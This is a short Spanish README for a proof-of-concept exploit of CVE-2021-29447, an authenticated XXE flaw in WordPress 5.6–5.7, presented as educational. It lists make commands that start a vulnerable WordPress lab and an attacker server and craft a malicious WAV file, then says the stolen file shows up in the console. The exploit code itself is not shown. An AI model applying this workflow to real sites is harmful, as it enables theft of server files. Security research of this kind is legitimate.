
Prueba de concepto del exploit para CVE-2021-29447, una vulnerabilidad XXE autenticada en WordPress 5.6-5.7. Incluye configuración del laboratorio, generación de WAV malicioso y servidor del atacante para pruebas educativas.
$ make up-wp
$ make up-mal
$ make make-wav
open http://localhost:8000/
open http://localhost:8000/wp-admin/
mira en la consola el archivo sustraído y puede ser decodificado
información sobre los comandos posibles en el archivo dtd del atacante https://www.php.net/manual/en/wrappers.php.php